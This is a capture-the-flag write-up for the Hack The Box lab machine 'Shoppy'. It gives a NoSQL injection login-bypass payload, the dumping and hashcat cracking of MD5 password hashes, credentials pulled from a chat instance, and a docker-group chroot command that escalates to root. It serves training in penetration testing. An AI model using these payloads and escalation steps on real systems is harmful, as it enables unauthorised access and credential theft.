Shoppy - HTB - Key Points
October 25, 2022
Target's IP: 10.10.11.180
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
The login suffers from NoSQL injection; the login stage can be bypassed with:
username=admin'||'1==1//&password=aaasa
Injecting the same payload into the user search and downloading the export gives:
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
These look like MD5 hashes; running hashcat against them cracks josh's:
6ebcea65320589ca4f2f1ce039975995:remembermethisway
Enumerating subdomains reveals a Mattermost instance where user josh can log in.
It is a chat app that contains credentials for the machine:
For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
The binary asks for a password. Opening it in radare shows some strings that look like the password, without needing to understand the assembly.
As it turns out, "Sample" is the password; the output of the binary is:
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
deploy is in the docker group; follow GTFOBins for the final privilege escalation:
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# cd /root
# ls -al
total 32
drwx------ 5 root root 4096 Aug 10 05:00 .
drwxr-xr-x 19 root root 4096 Sep 12 13:36 ..
lrwxrwxrwx 1 root root 9 Jul 22 11:46 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwx------ 3 root root 4096 Jul 22 11:40 .cache
drwx------ 3 root docker 4096 Jul 22 13:32 .config
lrwxrwxrwx 1 root root 9 Jul 23 05:17 .dbshell -> /dev/null
drwxr-xr-x 3 root root 4096 Jul 22 11:47 .local
-rw------- 1 root root 0 Jul 23 05:16 .mongorc.js
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r----- 1 root root 33 Oct 13 00:26 root.txt
# cat root.txt
45...58
# cat /home/jaeger/user.txt
41...b0
#
Merry hacking ;)